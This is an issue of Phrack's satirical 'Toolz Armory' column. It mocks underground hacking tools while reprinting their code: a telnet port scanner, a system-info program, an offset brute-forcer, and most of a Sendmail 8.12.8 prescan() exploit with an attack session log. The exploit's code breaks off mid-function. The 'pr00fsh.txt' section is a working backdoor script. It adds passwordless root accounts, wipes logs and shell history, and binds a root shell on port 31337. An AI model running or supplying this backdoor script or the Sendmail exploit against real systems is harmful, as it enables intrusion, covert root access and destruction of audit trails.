                            ==Phrack Inc.==

               Volume 0x0b, Issue 0x3e, Phile #0x04 of 0x0f

|=--------------------=[ T O O L Z   A R M O R Y ]=----------------------=|
|=-----------------------------------------------------------------------=|
|=-----=[ skyper's harddrive[ root@segfault.net:/cvs/0day# ls   ]=-------=|
|=---------=[ brought to you by elguapo 'the warez' gestapo ]=-----------=|


This is a totally revamped Toolz Armory. Previous editions focused too much
on whitehat 'tools' that never get used. This section will now focus on the
latest and greatest hacker code on the internet. While some of these codes
are more dated than others, they are nonetheless some of the greatest 
examples of why Full Disclosure is fucking pathetic. HERE'Z THE 0DAY!




--[ Contents

  1 - vanilla.sh
  2 - sysinfo.c
  3 - pr00fsh.txt
  4 - ESobf.c
  5 - north_sendmail.c
  6 - secbug.c




--[ 1 - vanilla.sh

Author: Ben to the muthafuckin Z
Affliations: Team OG (Ripping off Taco Bell since '01)
Comment: y0, i use thiz c0de all the time to scan those awesome korean 
	   networks which provide the greatest bounce for me to hack shit in
       the us. n0thing like making ge0rge bush thinking that k0rea is 
	   trying to take us out! use this code to map out all the available
	   TCP services. its just gr8!

++> Begin 0day
#!/bin/sh
# vanilla.sh - tcp connection (telnet) port scanner for non-root users
#        by: ben-z(@alloymail.com) http://benz.staticky.com
# set up our environment
vv="[vanilla!benz]:"
count="$2"
mv .vs.tmp .vs.tmp.bak 1>/dev/null 2>/dev/null
clear
if [ `whoami` = "root" ]; then
 echo "$vv this portscan was designed for normal users <non-root>."
 echo "$vv it would make more sense for you to use a faster scanning "
 echo "$vv utility such as nmap <http://www.insecure.org/nmap> or    "
 echo "$vv strobe <ftp://sunsite.unc.edu>. If you still want to continue,"
 echo "$vv you may switch to a normal user account and run this again. "
 exit 0
fi

# print the usage instructions
if [ "$2" = "" ]; then
 echo "$vv usage is: $0 <host> <start port> [-c]"
 echo "$vv  examples:"
 echo "$vv   vs 127.0.0.1 1024  <-- this would scan 127.0.0.1 p1024->65535"
 echo "$vv   vs 127.0.0 23 -c   <-- this would scan 127.0.0.1-255 p23"
 exit 0
fi

# do a single host scan if no -c if provided
if [ "$3" = "-c" ]; then
 echo "$vv not yet implemented.. sorry :P"
 exit 0
fi
echo ""
echo "$vv now scanning $1 on ports $count -> 65535."
echo "vanilla.sh v1 by ben-z(@alloymail.com) http://benz.staticky.com"
>>.vs.tmpecho "$vv results of scan on $1 ($count -> 65535):" >>.vs.tmp
while [ "$count" != "65535" ]; do count=`expr $count + 1`
 echo -n "$vv ($count) attempting connection to $1"
 telnet $1 $count 1>.vs2.tmp 2>.vs2.tmp &
 killall -9 telnet 1>/dev/null 2>/dev/null
 cat .vs2.tmp | grep -v refused | grep closed >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  echo -n "   connected!"
  # try to determine which port we found
  if [ "$count" = "1" ]; then
    echo "1/tcp: tcpmux" >>.vs.tmp
   fi
 echo -n "   connected!"
  # try to determine which port we found
  if [ "$count" = "1" ]; then
    echo "1/tcp: tcpmux" >>.vs.tmp
   fi
   if [ "$count" = "7" ]; then
    echo "7/tcp: echo" >>.vs.tmp
   fi
   if [ "$count" = "9" ]; then
    echo "9/tcp: discard" >>.vs.tmp
   fi
   if [ "$count" = "11" ]; then
    echo "11/tcp: systat" >>.vs.tmp
   fi
   if [ "$count" = "13" ]; then
    echo "13/tcp: daytime" >>.vs.tmp
   fi
.. [knip]
fi
echo ""
done
exit 0
--> End 0day
 



--[ 2 - sysinfo.c

Author: Brainstorm 
Affliations: Electronic Souls (Getting Raided since '03)
Comment: omg. This quite possibly the most used code among the Phrack Staff.
		Ever get on a Linux box and what to know whats going down? THIS CODE
	    IS FOR YOU! This could easily be written in a shell script, but fuck
	    that! Calling execl() to cat files is the m0st d4rk method out there. 
	    ES is just 2blackhat4u. They be smashin' and backdoorin' like they're
	    getting raided tomorrow! NO HOLDS BARRED!

++> Begin 0day
/*
 * (C) BrainStorm - ElectronicSouls
 * small application to get some system information
 * yes i know its simple..so ? doesnt make it useless :P
 * might be a nice bin for Blackhat linux :>
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>

int main(int argc, char **argv[])
{
 char *select;

       printf("\n\n +++ ElectronicSouls System Information +++ \n\n");

       if (strstr(argv[1], "-cpu") != NULL)
       {
         printf("\n *** CPU MODEL *** \n\n");
         execl("/bin/cat","/bin/cat","/proc/cpuinfo",0);
       }

       if (strstr(argv[1], "-mem") != NULL)
       {
         printf("\n *** MEMORY INFORMATION: *** \n\n");
         execl("/bin/cat","/bin/cat","/proc/meminfo",0);
       }

       if (strstr(argv[1], "-mod") != NULL)
       {
         printf("\n *** KERNEL MODULES: *** \n\n");
         execl("/bin/cat","/bin/cat","/proc/modules",0);
       }

       if (strstr(argv[1], "-dev") != NULL)
       {
         printf("\n *** DEVICES: *** \n\n");
         execl("/bin/cat","/bin/cat","/proc/devices",0);
       }

       if (strstr(argv[1], "-lod") != NULL)
       {
         printf("\n *** LOAD AVERAGE: *** \n\n");
         execl("/bin/cat","/bin/cat","/proc/loadavg",0);
       }

       if (strstr(argv[1], "-fs") != NULL)
       {
         printf("\n *** FILESYSTEM STATUS: *** \n\n");
         execl("/bin/cat","/bin/cat","/proc/stat",0);
       }

       if (strstr(argv[1], "-mnt") != NULL)
       {
         printf("\n *** MOUNTED: *** \n\n");
         execl("/bin/cat","/bin/cat","/proc/mounts",0);
       }

       if (strstr(argv[1], "-iop") != NULL)
       {
         printf("\n *** IOPORTS: *** \n\n");
         execl("/bin/cat","/bin/cat","/proc/ioports",0);
       }

       if (strstr(argv[1], "-pt") != NULL)
       {
         printf("\n *** PARTITIONS: *** \n\n");
         execl("/bin/cat","/bin/cat","/proc/partitions",0);
       }

       if (strstr(argv[1], "-pt") != NULL)
       {
         printf("\n *** INTERRUPTS: *** \n\n");
         execl("/bin/cat","/bin/cat","/proc/interrupts",0);
       }

       if (argv[1], "-h")
       {
         printf("\n Help: \n\n");
         printf("./sys -cpu : will give you cpu informations \n"); /* no argv[0]
 this time heh */
         printf("      -mem : shows you memory informations  \n");
         printf("      -mod : lists the kernel modules       \n");
         printf("      -dev : gives you device informations  \n");
         printf("      -lod : shows the load average         \n");
         printf("      -fs  : lists file system informations \n");
         printf("      -mnt : shows the mounted devices      \n");
         printf("      -iop : lists the IO Ports             \n");
         printf("      -pt  : lists the existing partitions  \n");
         printf("      -ir  : shows the interrupts           \n\n");
       }

 exit(0);

}
--> End 0day

[ editor's note: y0 brainst0rm. you might want to brush up on your C in 24
	Hours and man getopt_long() ]




--[ 3 - pr00fsh.txt

Author: Digital Ebola
Affliations: Legions of the Underground (Sucking Cock since '99)
Comments: I'm just in awe of the ability demonstrated here. Seriously, who
	  uses kernel modules and trojaned binaries anymore when you're 
	  backdooring dugsong? This script is *guaranteed* to cover all 
	  of your tracks as you're hacking your way into w00w00's silcnet
	  server. 

++> Begin 0day
cp /etc/hosts.allow /tmp/h.a
cp /etc/hosts.deny /tmp/h.d
cp /etc/inetd.conf /tmp/i.c

echo "# /etc/hosts.allow" > /etc/hosts.allow
echo "#" >> /etc/hosts.allow

echo "# /etc/hosts.deny" > /etc/hosts.deny
echo "#" >> /etc/hosts.deny
echo unf::9998:9998:unf,,,:/tmp:/bin/bash >> /etc/passwd
echo unf2::0:0:unf,,,:/tmp:/bin/bash >> /etc/passwd
echo unf::0:99999:7::: >> /etc/shadow
echo unf2::0:99999:7::: >> /etc/shadow
cat /dev/null > /root/.bash_history
cat /dev/null > /tmp/.bash_history
cat /dev/null > /var/log/syslog
cat /dev/null > /var/log/messages
cat /dev/null > /var/log/wtmp

killall -9 inetd
echo "31337     stream  tcp     nowait  root    /bin/sh -i" >> /etc/inetd.conf

`which inetd`
--> End 0day




--[ 4 - ESobf.c

Author: vux
Affliations: ElectronicSouls (Gettin' Raided since '03) 
Comments: This amazing tool allows even the laziest of hackers to find the 
		  proper offset for some 0day man(1) warez. Why bother writing a 3 line
		  shell script when you can compile it in C! Someone PLEASE stop
		  ElectronicSouls from producing anymore of these blackart tools 
		  before they get raided again!!! 

--> Begin 0day
/* (C) vux [ElectronicSouls]
 *
 * PROPERTY OF THE ELECTRONICSOULS CREW !
 * DO NOT DISTRIBUTE !
 *
 * simple offset brute forcer - easy guessing the offset needed to run any 
   exploit succefully.
 * it's not tested but it should work! if you find any error in the code,
   please let me know! 
 *
 */

#include <stdio.h>
#define PATH "/path/to/exploit -o [ofst]" // change it to the exploits's
                                          // path with the offsets's param

int main() {
 int var;
 for (var = -2000;var < 2000;var = var +1); {
 printf("\tbrute forcing : \n");
 printf("trying offset : %d\n", var);
 system("ulimit -c 0; %s "PATH"", var); 
 return 0;
}
}
++> End 0day




--[ 5. north_sendmail.c

Author: north
Affliations: #plan9@efnet
Comments: INITIATING ATTACK VECTOR EXPLOITATION CODE WRAPPER....
	  SEQUENCE COMPLETED... INJECTING TRANSPOSED VECTOR INTO EXPLOITABLE REMOTE STREAM!
	  HOLY SHIT! USING THIS EXPLOIT IS KINDA LIKE BITING INTO A Y0RK PEPPERMINT PATTY!
	  DONT TELL ANYBODY, BUT WHENEVER I USE NORTH'S EXPLOITS I FEEL LIKE CAPTAIN KIRK
	  COMMANDING THE STARSHIP ENTERPRISE! HIGH TECH WOWOW!
All I gotta say is that this exploit outdoes any GOBBLES exploit ever
	in the comments to code ratio. I think north provided enough information
	to write a fucking book with this. And the great thing is it doesn't even
	give you a rootshell!!! 

--> Begin 0day
/*
 * 127 Research and Development
 * 
 * Sendmail v8.12.8 and older prescan() exploit.
 *
 * Console users, please set your tabstop to 4
 * 
 * Don't buy the hype! This vulnerability is not your straight forward overflow
 * or frame pointer overwrite. If you have received code that asserts said 
 * claim, consider possibly hostile. 
 *
 * How this vulnerability works:
 *
 * The prescan vulnerability (purportedly found by Michael Zalewski) is much 
 * more fun than the standard overflow. Though the stack may be overwritten, it 
 * may only be overwritten with one of two specific values: 0x5c or 0x00. 
 * Because of this restriction, values altered on the stack can be changed to 
 * a much more limited set of valid addresses. 
 *
 * An interesting fact about prescan is that, despite overrunning the stack, the
 * overrun is practically moot. Since prescan always tests for any kind of 
 * invalidity, usrerr() will be called. Prescan can not be returned from due to
 * these checks if an overflow is implemented. Usrerr's functionality specifies 
 * that it raises an exception via the sm library if QuickAbort is set to true.
 * QuickAbort is frequently set to true on entry to functions that call prescan.
 *
 * The result of a raised exception is the restoration of environment at a given
 * point of execution. SmExcHandler, the exception handler, is probed for the
 * information to restore said environment. Information is typically stored in
 * a standard UNIX sigjmp_buf in the sm_exc_handler structure. This structure
 * is declared before entry to many SMTP command code segments with the SM_TRY
 * macro, conveniently placing the handler on the stack. 
 *
 * The structure of a typical UNIX sigjmp_buf is an array of address values
 * defining what the execution environment looked like, as a snapshot, at a
 * specific point in code execution. A sigjmp_buf is generated in a UNIX 
 * environment using functions such as [_]sigjmp() or sigsetjmp(). Frequently,
 * the first value in this array of addresses defines the PC that should be
 * reentered with a call to siglongjmp() or [_]longjmp(). These functions
 * recreate the environment specified by the sigjmp_buf and place the PC
 * in a location the CPU can place into the PC register on return. 
 *
 * In certain situations, the Exception Handler placed on the stack may be
 * reached when we overflow a buffer with prescan's vulnerability, allowing
 * us to overwrite the values stored in the sigjmp_buf. However, since we
 * may only overwrite memory with 0x5c and a terminating nul, execution 
 * redirection is extremely limited, but, not ungratifying. 
 *
 * By overwriting the PC with 0x00, 0x005c, 0x005c5c, etc, we can manipulate
 * execution of this altered PC by forcing an exception to be raised with
 * our already illegal length. In certain (extremely temperamental) conditions
 * we can drop into a pseudo-random point in the valid data segment, thus
 * continuing execution. This executed code, however, submits to its env,
 * assuming that the values in the stack are valid for its purpose. If we
 * are able to drop into a segment of code that expects values on the stack
 * to be of a format we can manipulate to our benefit, the current code may
 * be exploited: generating a secondary vulnerability. Remember, the stack
 * environment regenerated by siglongjmp/[_]longjmp still points to data
 * read from the network. Thus, it is possible to exploit this secondary
 * vulnerability in order to execute malicious code we provide over the
 * network.
 *
 * Yet, it is still not quite that simple. While reading from the network,
 * sendmail parses commands one of two ways. Either it begins to interpret a
 * command when a newline is read from the network, or, when up to 2048 octets
 * are read from the network. sm_io_fgets() calls the network read function 
 * which stores a given amount of data in its buffer. The value of the read
 * buffer for the sendmail file structure is 17376. Basically, this means that
 * even though a command is attempted to be parsed after, at the most, 2048
 * octets read from the network, we can store a large amount of unaltered
 * data in memory. This unaltered memory is perfect for malicious machine code
 * since it will never become subject to a lexicon that attempts to weed out 
 * invalid octets.
 *
 * The SMTP command packet, however, is another story. It is subject to 
 * restrictions found in parseaddr.c's TokTypeTab and StateTab arrays, which
 * may cause prescan to return before an overflow may occur. Since this buffer
 * is the closest we can get to the values found in the sigjmp_buf, we must
 * post a fake stack frame here, before the octets that create the actual
 * overflow condition. Adhereing to the rules of TokTypeTab and StateTab, we
 * are still able to create valid stack addresses for many popular UNIX
 * Operating Systems. Once our mangled PC is executed, this maliciously 
 * generated stack frame can suit as a trampoline to our malicious machine 
 * code in sendmail's file structure's read buffer.
 *
 * There is no cookie cutter solution to exploiting this vulnerability. 
 * However, exploitation has proven to be possible on several target UNIX
 * operating systems. 
 *
 * How this exploit works:
 * 
 * This exploit allows a queue to be built, from which individual packets
 * are sent to a target host. 
 *
 * Queues are built from the five segment structures, which create a 
 * conceptually fragmented view of a full packet. 
 *
 * The structure of a single packet can be perceived as:
 *		[ ... Global Packet ...............                            ]
 *		[SMTP Command][Stack Frame][Overflow Octets]['\n'][Machine Code]
 *		      0             1              2           3        4
 *
 * Segment Descriptions
 *
 * Segment 0
 *
 * Segment zero contains a SMTP Command (e.g. HELO) and optionally, its
 * parameters. The command is generated from a string read via prejack's
 * command line. Trailing white space (up to the newline) are kept.
 *
 * Segment 1
 *
 * Segment one contains a bitmap that will represent a malicious stack frame
 * used by the target machine once its PC is mangled. The bitmap is loaded
 * from a file whose name is read via prejack's command line.
 *
 * Segment 2
 *
 * Segment two contains the overflow segment, an array of the repeating pattern
 * "\x5c\xff" which is necessary to force the overflow. Note that for every
 * instance of this pattern, it generates only *one* character (0x5c) in the
 * target's buffer. Therefore, to reach a sigjmp_buf 512 octets away, you must
 * use 1024 octets. The length of this segment is read from the command line
 * as a decimal number.
 *
 * Segment 3
 *
 * Segment three contains a single newline, needed to seperate sendmail's 
 * concept of commands. Segments 0 through 3 create a single command, while 
 * segment four is interpreted as a second command and isn't parsed, but, is 
 * still stored in memory. 
 *
 * Segment 4
 *
 * Segment four contains a bitmap of machine code used on the target system.
 * This code is loaded from a file whose name is given on the prejack command
 * line. 
 *
 * Queues are built incrementally from segment 0 to segment 4, skipping any
 * segments with no data.
 *
 * This vulnerability was extremely fun to analyze. Enjoy!
 * Sorry, bitmaps (and possibly batteries) not included
 *
 * Exploit written on Sunday, April 27, 2003. 
 *
 * Total time spent reading the sendmail code for the first time: 4 days
 * Total time spent generating the exploit strategy/code: 4 hours 52 minutes
 * Total time spent writing this header: 1 hour  <-- haha :)
 *
 * - north_ 
 *
 * northern_snow78@yahoo.com
 * http://blessedchildren.virtualave.net/
 * #plan9@EFnet
 * 
 */

/*
 * Example program usage
 *
 * pumpkin.north_ % ./prejack                                    
 * prejack> set address=1.3.27.105
 * set.
 * prejack> set port=25
 * set.
 * prejack> segment 0 HELO pumpkin.autumn.net.sc
 * done.
 * prejack> queue add
 * generating queue entry from current segments...
 * adding segment 0
 * added.                  
 * prejack> segment 0 MAIL FROM: north_@autumn.net.sc
 * done.
 * prejack> queue add
 * generating queue entry from current segments...
 * adding segment 0
 * added.
 * prejack> segment 0 RCPT TO:
 * done.
 * prejack> segment 1 ../q
 * attempting to load bitmap from file ../q
 * loading 1240 octets... done.
 * prejack> segment 2 390
 * generating overflow vector segment of length 390
 * done.
 * done.                
 * prejack> queue add
 * generating queue entry from current segments...
 * adding segment 0
 * adding segment 1
 * adding segment 2
 * added.
 * prejack> queue dump
 * queue slot 0; vector=0804d040; len=26;
 *          dumping 26 bytes for tagging
 * {
 * 48 45 4c 4f 20 70 75 6d 70 6b 69 6e 2e 61 75 74 HELO pumpkin.aut
 * 75 6d 6e 2e 6e 65 74 2e 73 63 umn.net.sc
 * }
 * queue slot 1; vector=0804d060; len=31;
 *          dumping 31 bytes for tagging
 * {
 * 4d 41 49 4c 20 46 52 4f 4d 3a 20 6e 6f 72 74 68 MAIL FROM: north
 * 5f 40 61 75 74 75 6d 6e 2e 6e 65 74 2e 73 63 _@autumn.net.sc
 * }
 * queue slot 2; vector=0805f800; len=1639;
 *          dumping 32 bytes for tagging
 * {
 * 52 43 50 54 20 54 4f 3a 20 71 71 71 71 71 71 71 RCPT TO: qqqqqqq
 * 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 qqqqqqqqqqqqqqqq
 * }
 * prejack> run
 * attempting to connect...
 * connected.
 * starting the client, pushing the FIFO
 * stand by for session transaction ...
 * recv="220 slushpuppy.autumn.net.sc ESMTP Sendmail 8.12.8/8.12.8; Sun, 27 Apr 200
 * 3 15:13:30 -0400 (EDT)"
 * sending queue slot 0
 * recv="250 slushpuppy.autumn.net.sc Hello pumpkin.autumn.net.sc [1.3.27.103], ple
 * ased to meet you"
 * sending queue slot 1
 * recv="250 2.1.0 north_@autumn.net.sc... Sender ok"
 * sending queue slot 2
 * warning: connection reset by peer
 * done.
 * prejack> exit
 * goodbye.
 * pumpkin.north_ %
 *
 * Note that the "connection reset by peer" was caused by SIGSEGV
 *
 */

#include <sys/time.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <fcntl.h>
#include <stdio.h>
#include <ctype.h>
#include <errno.h>

#define nil ((void * )0)

enum {
	Cexit,
	Cset,
	Crun,
	Csegment,
	Cqueue,
	Cerr,
};

typedef unsigned char uchar;

typedef struct Setting Setting;
typedef struct Segment Segment;
typedef struct Queue Queue;

struct Setting {
	const char * name;
	const char * type;
	char * value;
	const char * descr;
};

struct Segment {
	const char * name;
	void (*action)(char * );
	void (*dump)(Segment * );
	uchar * vector;
	uint len;
};

struct Queue {
	uchar * vector;
	uint len;
	Queue * next;
};

static Setting settings[] = {
	{
		"address",
		"string",
		nil,
		"target ipv4 address"
	},
	{
		"port",
		"integer",
		nil,
		"sendmail server port number"
	},
	{
		"alarm",
		"integer",
		nil,
		"duration in seconds for read timeout"
	},
	{
		"delay",
		"integer",
		nil,
		"duration to delay between queue sends"
	},
	{
		nil,
		nil,
		nil,
		nil
	}
};

static void seg0action(char * );
static void seg0dump(Segment * );
static void seg1action(char * );
static void seg1dump(Segment * );
static void seg2action(char * );
static void seg2dump(Segment * );
static void seg3action(char * );
static void seg3dump(Segment * );
static void seg4action(char * );
static void seg4dump(Segment * );

static Segment segments[] = {
	{
		"smtp command",
		seg0action,
		seg0dump,
		nil,
		0
	},
	{
		"attack bitmap",
		seg1action,
		seg1dump,
		nil,
		0
	},
	{
		"overflow vector",
		seg2action,
		seg2dump,
		nil,
		0
	},
	{
		"newline",
		seg3action,
		seg3dump,
		nil,
		0
	},
	{
		"excess data",
		seg4action,
		seg4dump,
		nil,
		0
	}
};

static Queue * queue = nil;
static int alarmcalled = 0;

static void fatal(const char * );
static void message(char * );
static void readline(char ** );
static int command(char * );
static int command2cmd(char ** );
static void cmdrun(char * );
static void cmdset(char * );
static void cmdsegment(char * );
static void cmdsegmentusage(void);
static void cmdqueue(char * );
static void cmdqueueusage(void);
static void dumpsegment(int);
static void printsettings(void);
static void loadbitmap(Segment * , char * );
static void hexdump(uchar * , uint);
static void queuedump(void);
static void queueadd(void);
static void queuedel(void);
static void alarmcall(int);
static int dialout(void);
static int readnet(int);

int
main(void)
{
	char * buffer;

	signal(SIGALRM, alarmcall);

	do
	{
		message("prejack> ");
		readline(&buffer);

		if(command(buffer) == Cexit)
			break;
	}
	while(1);
}

static void
fatal(const char * fun)
{
	perror(fun);
	exit(1);
}

static void
message(char * msg)
{
	if(write(1, msg, strlen(msg)) != strlen(msg))
		fatal("write@message()");
}

static void
readline(char ** bp)
{
	char buffer[2048];
	char * c;
	int spin;
	int xa;

	memset(buffer, 0, sizeof(buffer));
	c = &buffer[0];

	xa = 0;

	spin = 1;
	do
	{
		xa = read(0, c, 1);
		switch(xa) {
		default:
		case -1:
			{
				fatal("read@readline()");
			}
		case 0:
			{
				spin = 0;
				break;
			}
		case 1:
			{
				if(*c == '\n' || *c == '\r' || 
				  (c - buffer) >= sizeof(buffer) - 1) {
					*c = 0;
					spin = 0;
				}
				c++;

				break;
			}
		}
	}
	while(spin);

	if((*bp = strdup(buffer)) == nil)
		fatal("strdup@readline()");
}

static int
command(char * cs)
{
	char * args;
	int cmd;

	args = cs;

	cmd = 0;
	cmd = command2cmd(&args);

	switch(cmd) {
	case Cexit:
		{
			message("goodbye. \n");
			break;
		}
	case Cerr:
		{
			message("error: invalid command \n");
			break;
		}
	case Crun:
		{
			cmdrun(args);
			break;
		}
	case Cset:
		{
			cmdset(args);
			break;
		}
	case Csegment:
		{
			cmdsegment(args);
			break;
		}
	case Cqueue:
		{
			cmdqueue(args);
			break;
		}
	}

	free(cs);

	return cmd;
}

static int
command2cmd(char ** csp)
{
	char * cs;
	int cmd;
	int xa;

	cmd = Cerr;
	xa = 0;

	cs = *csp;

	if(strncasecmp(cs, "exit", strlen("exit")) == 0) {
		xa = strlen("exit");
		cmd = Cexit;
	}
	else if(strncasecmp(cs, "set", strlen("set")) == 0) {
		xa = strlen("set");
		cmd = Cset;
	}
	else if(strncasecmp(cs, "run", strlen("run")) == 0) {
		xa = strlen("run");
		cmd = Crun;
	}
	else if(strncasecmp(cs, "segment", strlen("segment")) == 0) {
		xa = strlen("segment");
		cmd = Csegment;
	}
	else if(strncasecmp(cs, "queue", strlen("queue")) == 0) {
		xa = strlen("queue");
		cmd = Cqueue;
	}

	*csp = cs + xa;

	return cmd;
}

static void
cmdset(char * args)
{
	Setting * s;
	char * as;
	char * c;

	for(as = args; isascii(*as) && isspace(*as) && *as != 0; as++)
		continue;

	// if no arguments, print the settings
	if(*as == 0) {
		printsettings();
		return;
	}

	for(c = as; isascii(*c) && !isspace(*c) && *c != 0; c++)
		continue;
	*c = 0;

	if((c = strchr(as, '=')) == nil) {
		message("usage: set [variable=value] \n");
		return;
	}
	*c++ = 0;

	if(*c == 0) {
		message("usage: set [variable=value] \n");
		return;
	}

	if(strcasecmp(as, "address") == 0)
		s = &settings[0];
	else if(strcasecmp(as, "port") == 0)
		s = &settings[1];
	else if(strcasecmp(as, "alarm") == 0)
		s = &settings[2];
	else if(strcasecmp(as, "delay") == 0)
		s = &settings[3];
	else {
		fprintf(stdout, "error: invalid variable %s \n", as);
		fflush(stdout);
		return;
	}

	if(s->value)
		free(s->value);

	if((s->value = strdup(c)) == nil)
		fatal("strdup@cmdset()");

	message("set.\n");
}

static void
cmdrun(char * args)
{
	char buffer[2048];
	Queue * q;
	char * c;
	int fd;
	int xa;
	int d;
	int e;

	if(queue == nil) {
		fprintf(stdout, "empty queue. build a queue before attacking. \n");
		return;
	}

	fd = 0;
	if((fd = dialout()) == -1)
		return;

	// set an optional delay between queue sends
	d = 0;
	if(settings[3].value)
		d = atoi(settings[3].value);

	fprintf(stdout, "starting the client, pushing the FIFO \n");
	fprintf(stdout, "stand by for session transaction ... \n");
	fflush(stdout);

	// read the banner
	if(readnet(fd) == -1) {
		close(fd);
		return;
	}

	// start the queue push
	xa = 0;
	for(q = queue; q; q = q->next) {
		if(d) {
			fprintf(stdout, "delaying %ds ", d);
			fflush(stdout);

			for(e = 0; e < d; e++) {
				fprintf(stdout, ".");
				fflush(stdout);
				sleep(1);
			}
			fprintf(stdout, "\n");
		}

		fprintf(stdout, "sending queue slot %d \n", xa++);
		fflush(stdout);

		if(write(fd, q->vector, q->len) != q->len) {
			fprintf(stdout, "error: network write failed: %s \n",
				strerror(errno));
			break;
		}

		// always write a newline since we cant write one in the segments
		if(write(fd, "\n", 1) != 1) {
			fprintf(stdout, "error: network write failed: %s \n",
				strerror(errno));
			break;
		}

		if(readnet(fd) == -1)
			break;
	}

	close(fd);

	fprintf(stdout, "done. \n");
	fflush(stdout);
}

static void
cmdsegment(char * args)
{
	char * as;
	char * c;
	char tmp;
	int seg;

	for(as = args; isascii(*as) && isspace(*as) && *as != 0; as++)
		continue;

	for(c = as; isascii(*c) && !isspace(*c) && *c != 0; c++)
		continue;

	for(; isascii(*c) && isspace(*c) && *c != 0; c++)
		continue;

	seg = 0;
	seg = atoi(as);

	if(seg < 0 || seg > 4 || *c == 0) {
		cmdsegmentusage();
		return;
	}

	for(as = c; isascii(*c) && !isspace(*c) && *c != 0; c++)
		continue;

	if(strcasecmp(as, "dump") == 0) {
		dumpsegment(seg);
		return;
	}

	segments[seg].action(as);

	fprintf(stdout, "done. \n");
	fflush(stdout);
}

static void
cmdsegmentusage(void)
{
	message("usage: segment number action [arg] \n");
	message(" segment 0 { dump | string  } # set the SMTP command string \n");
	message(" segment 1 { dump | file    } # load the special seg from bitmap file \n");
	message(" segment 2 { dump | integer } # define the length of the overflow seg \n");
	message(" segment 3 { dump | integer } # force a newline between seg2 and seg4 \n");
	message(" segment 4 { dump | file    } # load extra segment from bitmap file \n");
}

static void
cmdqueue(char * args)
{
	for(; isascii(*args) && isspace(*args) && *args != 0; args++)
		continue;

	if(strncasecmp(args, "dump", strlen("dump")) == 0)
		queuedump();
	else if(strncasecmp(args, "add", strlen("add")) == 0)
		queueadd();
	else if(strncasecmp(args, "del", strlen("del")) == 0)
		queuedel();
	else
		cmdqueueusage();
}

static void
cmdqueueusage(void)
{
	message("usage: queue { add | del | dump } \n");
}

static void
dumpsegment(int seg)
{
	segments[seg].dump(&segments[seg]);

	fprintf(stdout, "dumped. \n");
	fflush(stdout);
}

static void
printsettings(void)
{
	Setting * s;
	int xa;

	fprintf(stdout, "\n");
	fprintf(stdout, "%-8s %-8s %-8s \n", "name", "type", "value");
	for(xa = 0; xa < 27; xa++)
		fprintf(stdout, "-");
	fprintf(stdout, "\n");

	for(s = &settings[0]; s->name != nil; s++) {
		fprintf(stdout, "%-8s %-8s %-16s %s \n", s->name, s->type, 
			s->value != nil ? s->value : "", s->descr);
	}

	fprintf(stdout, "\n");
	fflush(stdout);
}

static void
seg0action(char * action)
{
	if(segments[0].vector)
		free(segments[0].vector);

	if((segments[0].vector = strdup(action)) == nil)
		fatal("strdup@seg0action()");

	segments[0].len = strlen(segments[0].vector);
}

static void
seg0dump(Segment * s)
{
	fprintf(stdout, "%s=\"%s\" \n", s->name, s->vector ? 
		(char * )s->vector : "");
	fflush(stdout);
}

static void
seg1action(char * action)
{
	loadbitmap(&segments[1], action);
}

static void
loadbitmap(Segment * s, char * file)
{
	struct stat ssx;
	int fd;

	if(s->vector != nil) {
		free(s->vector);
		s->len = 0;
	}

	fprintf(stdout, "attempting to load bitmap from file %s \n", file);

	fd = 0;
	if((fd = open(file, O_RDONLY)) == -1) {
		fprintf(stdout, "error: unable to open bitmap file \n");
		return;
	}

	memset((void * )&ssx, 0, sizeof(ssx));
	if(fstat(fd, &ssx) == -1) {
		fprintf(stdout, "error: stat on bitmap file failed \n");
		close(fd);
		return;
	}

	if((signed )ssx.st_size <= 0) {
		fprintf(stdout, "error: bitmap file size invalid \n");
		close(fd);
		return;
	}

	fprintf(stdout, "loading %d octets... ", ssx.st_size);

	if((s->vector = calloc(1, ssx.st_size + 1)) == nil)
		fatal("calloc@loadbitmap()");

	s->len = ssx.st_size;

	if(read(fd, s->vector, s->len) != s->len) {
		fprintf(stdout, "error: read failed \n");
		free(s->vector);
		s->len = 0;
	}

	close(fd);
}

static void
seg1dump(Segment * s)
{
	fprintf(stdout, "dumping %d octets of segment \"%s\" \n", s->len, s->name);
	hexdump(s->vector, s->len);
}

static void
seg2action(char * action)
{
	uchar * v;
	int xa;

	if(segments[2].vector) {
		free(segments[2].vector);
		segments[2].vector = nil;
		segments[2].len = 0;
	}

	xa = 0;
	xa = atoi(action);
	if(xa <= 0 || xa > 2048) {
		fprintf(stdout, "error: segment length out of range \n");
		return;
	}

	fprintf(stdout, "generating %s segment of length %d \n", 
		segments[2].name, xa);

	if((segments[2].vector = calloc(1, xa + 1)) == nil)
		fatal("calloc@seg2action()");

	for(v = &segments[2].vector[0]; v - &segments[2].vector[0] < xa - 1; ) {
		*v++ = 0x5c;
		*v++ = 0xff;
	}
	*v++ = 'q';
	
	segments[2].len = xa;

	fprintf(stdout, "done. \n");
	fflush(stdout);
}

static void
seg2dump(Segment * s)
{
	fprintf(stdout, "%s=\"%.08x\" \n", s->name, s->len);
	fflush(stdout);
}

static void
seg3action(char * action)
{
	int xa;

	if(segments[3].vector) {
		free(segments[3].vector);
		segments[3].len = 0;
	}

	if((segments[3].vector = calloc(1, 1)) == nil)
		fatal("calloc@seg3action()");

	*segments[3].vector = '\n';
	segments[3].len = 1;
}

static void
seg3dump(Segment * s)
{
	fprintf(stdout, "%s=\"%.08x\" \n", s->name, s->len);
	fflush(stdout);
}

static void
seg4action(char * action)
{
	loadbitmap(&segments[4], action);
}

static void
seg4dump(Segment * s)
{
	fprintf(stdout, "dumping %d octets of segment \"%s\" \n", s->len, s->name);
	hexdump(s->vector, s->len);
}

static void
hexdump(uchar * vector, uint vlen)
{
    int u;
    int v;

	v = 0;
    for(u = 0; u < vlen; u++) {
        fprintf(stdout, "%.02x ", vector[u]);

        if((u + 1) % 16 == 0) {
            for(v = u - 15; v <= u; v++)
                fprintf(stdout, "%c", 
					isprint(vector[v]) ? vector[v] : '.');

            fprintf(stdout, "\n");
        }
    }

	if(v < vlen) {
		for(; v < vlen; v++) {
			fprintf(stdout, "%c", 
				isprint(vector[v]) ? vector[v] : '.');
    	}
